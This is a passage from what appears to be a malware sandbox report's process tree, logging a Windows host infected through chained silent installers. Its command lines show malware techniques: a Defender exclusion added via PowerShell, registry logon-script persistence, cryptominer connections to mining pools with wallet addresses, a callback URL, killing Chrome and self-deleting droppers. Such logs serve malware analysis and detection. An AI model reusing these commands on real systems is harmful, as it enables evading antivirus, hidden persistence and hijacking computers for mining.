C:\Users\Admin\AppData\Local\Temp\is-BR67B.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-BR67B.tmp\irecord.tmp" /SL5="$401EE,6265333,408064,C:\Program Files\Windows Defender\KPCYOJXKNY\irecord.exe" /VERYSILENT15⤵PID:4864
-
-
-
C:\Users\Admin\AppData\Local\Temp\c3-a4b5d-6ce-dcb9b-fce213016fd92\Kyzhyshuqyki.exe"C:\Users\Admin\AppData\Local\Temp\c3-a4b5d-6ce-dcb9b-fce213016fd92\Kyzhyshuqyki.exe"14⤵PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\78-fa533-163-cb2b0-e4f2c435ba625\Nonaqijyzhae.exe"C:\Users\Admin\AppData\Local\Temp\78-fa533-163-cb2b0-e4f2c435ba625\Nonaqijyzhae.exe"14⤵PID:5832
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scrxjqhl.mkj\md6_6ydj.exe & exit15⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\scrxjqhl.mkj\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\scrxjqhl.mkj\md6_6ydj.exe16⤵PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h4qhekcs.rkc\askinstall31.exe & exit15⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\h4qhekcs.rkc\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\h4qhekcs.rkc\askinstall31.exe16⤵PID:4428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i40mr1ek.1x3\toolspab1.exe & exit15⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\i40mr1ek.1x3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\i40mr1ek.1x3\toolspab1.exe16⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\i40mr1ek.1x3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\i40mr1ek.1x3\toolspab1.exe17⤵PID:6628
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4flsps1x.nwh\GcleanerWW.exe /mixone & exit15⤵PID:6272
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:4500
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:4120
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:4332
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5136
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5372
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6040
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5664
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe" 1 3.1617536684.6069a6acb963b 10313⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8072GIL28C\multitimer.exe" 2 3.1617536684.6069a6acb963b14⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\3ixnx41wofd\0n1pkd2rdee.exe"C:\Users\Admin\AppData\Local\Temp\3ixnx41wofd\0n1pkd2rdee.exe"15⤵PID:6740
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3ixnx41wofd\0n1pkd2rdee.exe"16⤵PID:5080
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300017⤵
- Runs ping.exe
PID:2848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dcehxyiit2i\vpn.exe"C:\Users\Admin\AppData\Local\Temp\dcehxyiit2i\vpn.exe" /silent /subid=48215⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\is-VMLA8.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-VMLA8.tmp\vpn.tmp" /SL5="$3027A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\dcehxyiit2i\vpn.exe" /silent /subid=48216⤵PID:6968
-
-
-
C:\Users\Admin\AppData\Local\Temp\lttqtigevbp\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\lttqtigevbp\cpyrix.exe" /VERYSILENT15⤵PID:6808
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\AdvancedRun.exe" /SpecialRun 4101d8 699218⤵PID:6568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ad41686a-3340-4944-9f1d-332d464fd1be\test.bat"19⤵PID:6328
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:6684
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:5988
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:7660
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:7692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 153217⤵
- Program crash
PID:7804
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6376
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:6572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhnevfk1u35\app.exe"C:\Users\Admin\AppData\Local\Temp\jhnevfk1u35\app.exe" /8-2315⤵PID:6860
-
-
C:\Users\Admin\AppData\Local\Temp\fhwsmf40dub\vict.exe"C:\Users\Admin\AppData\Local\Temp\fhwsmf40dub\vict.exe" /VERYSILENT /id=53515⤵PID:6852
-
C:\Users\Admin\AppData\Local\Temp\is-65512.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-65512.tmp\vict.tmp" /SL5="$30270,870426,780800,C:\Users\Admin\AppData\Local\Temp\fhwsmf40dub\vict.exe" /VERYSILENT /id=53516⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\is-2VK6O.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-2VK6O.tmp\win1host.exe" 53517⤵PID:6468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zeiib34d2ka\m1fayw4edbw.exe"C:\Users\Admin\AppData\Local\Temp\zeiib34d2ka\m1fayw4edbw.exe" /ustwo INSTALL15⤵PID:7036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "m1fayw4edbw.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zeiib34d2ka\m1fayw4edbw.exe" & exit16⤵PID:6536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "m1fayw4edbw.exe" /f17⤵
- Kills process with taskkill
PID:7164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ipcxv5mbpa4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ipcxv5mbpa4\Setup3310.exe" /Verysilent /subid=57715⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\is-9AULE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-9AULE.tmp\Setup3310.tmp" /SL5="$20388,138429,56832,C:\Users\Admin\AppData\Local\Temp\ipcxv5mbpa4\Setup3310.exe" /Verysilent /subid=57716⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\is-RGDA8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RGDA8.tmp\Setup.exe" /Verysilent17⤵PID:4780
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YGS3A801RU\setups.exe"C:\Users\Admin\AppData\Local\Temp\YGS3A801RU\setups.exe" ll12⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\is-Q5PE8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q5PE8.tmp\setups.tmp" /SL5="$30530,454998,229376,C:\Users\Admin\AppData\Local\Temp\YGS3A801RU\setups.exe" ll13⤵PID:5308
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵PID:5784
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:1764
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p5vzvby3vzn\vict.exe"C:\Users\Admin\AppData\Local\Temp\p5vzvby3vzn\vict.exe" /VERYSILENT /id=5358⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\is-SJKB9.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SJKB9.tmp\vict.tmp" /SL5="$10356,870426,780800,C:\Users\Admin\AppData\Local\Temp\p5vzvby3vzn\vict.exe" /VERYSILENT /id=5359⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\is-LIUN6.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-LIUN6.tmp\win1host.exe" 53510⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\NgfFJy2Cn.exe"C:\Users\Admin\AppData\Local\Temp\NgfFJy2Cn.exe"11⤵PID:3276
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rflatb2z1ku\p03k2iqaqo4.exe"C:\Users\Admin\AppData\Local\Temp\rflatb2z1ku\p03k2iqaqo4.exe"8⤵PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\af3pparh30w\vpn.exe"C:\Users\Admin\AppData\Local\Temp\af3pparh30w\vpn.exe" /silent /subid=4828⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\is-6K8PV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6K8PV.tmp\vpn.tmp" /SL5="$401FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\af3pparh30w\vpn.exe" /silent /subid=4829⤵PID:5472
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4924
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6096
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:4768
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:4420
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:7908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vju24ao0hv1\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vju24ao0hv1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\is-CKVOA.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-CKVOA.tmp\IBInstaller_97039.tmp" /SL5="$10426,14574507,721408,C:\Users\Admin\AppData\Local\Temp\vju24ao0hv1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-9RDSG.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5880
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-9RDSG.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5992
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:7492
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:7484
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:7564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\elqgds3zf12\s1qvevco14i.exe"C:\Users\Admin\AppData\Local\Temp\elqgds3zf12\s1qvevco14i.exe" /quiet SILENT=1 AF=7568⤵PID:5584
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\elqgds3zf12\s1qvevco14i.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\elqgds3zf12\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277440 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ugcmkv3oat\app.exe"C:\Users\Admin\AppData\Local\Temp\3ugcmkv3oat\app.exe" /8-238⤵PID:5736
-
C:\Users\Admin\AppData\Local\Temp\3ugcmkv3oat\app.exe"C:\Users\Admin\AppData\Local\Temp\3ugcmkv3oat\app.exe" /8-239⤵PID:6252
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JB5NLD89S3\setups.exe"C:\Users\Admin\AppData\Local\Temp\JB5NLD89S3\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\is-AGVD6.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-AGVD6.tmp\setups.tmp" /SL5="$80058,454998,229376,C:\Users\Admin\AppData\Local\Temp\JB5NLD89S3\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4648 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4492
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:908
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:1892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:1068
-
C:\Users\Admin\AppData\Roaming\ADA6.tmp.exe"C:\Users\Admin\AppData\Roaming\ADA6.tmp.exe"5⤵PID:4252
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:480
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5216
-
-
-
C:\Users\Admin\AppData\Roaming\B018.tmp.exe"C:\Users\Admin\AppData\Roaming\B018.tmp.exe"5⤵PID:2064
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\B018.tmp.exe6⤵PID:5524
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:152
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5636
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:1008
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4128
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4748
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:420
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2168
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4693CFFCF503C306B45CDFB331DF9D8E C2⤵PID:4036
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BF42E8649286007E221F4AFC31C54FE82⤵PID:5360
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\5a5261bae1554c08a5da12b3c0d16780 /t 1912 /p 38481⤵PID:5112
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6016
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5532
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7012
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5bd266ab-6caf-1c40-8ddc-840c09801417}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Suspicious use of WriteProcessMemory
PID:1816
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵PID:1080
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:1888
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6200
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:5152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6220
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4956
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6632